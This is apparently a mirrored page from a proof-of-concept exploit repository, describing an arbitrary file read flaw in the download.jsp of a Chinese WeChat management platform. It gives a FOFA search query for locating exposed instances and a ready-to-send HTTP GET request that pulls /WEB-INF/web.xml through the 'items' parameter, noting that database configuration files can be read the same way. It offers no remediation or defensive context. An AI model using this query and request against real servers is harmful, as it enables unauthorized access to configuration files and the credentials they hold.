mirror of
https://github.com/eeeeeeeeee-code/POC.git
synced 2025-11-05 02:15:30 +00:00
18 lines
451 B
Markdown
18 lines
451 B
Markdown
# 金盘微信管理平台download.jsp任意文件读取漏洞
|
||
|
||
金盘微信管理平台download.jsp任意文件读取漏洞,通过该漏洞读取数据库配置文件等
|
||
|
||
## fofa
|
||
|
||
```javascript
|
||
title=="微信管理后台"
|
||
```
|
||
|
||
## poc
|
||
|
||
```javascript
|
||
GET /mobile/pages/admin/tools/file/download.jsp?items=/WEB-INF/web.xml HTTP/1.1
|
||
Host:
|
||
```
|
||
|
||
 |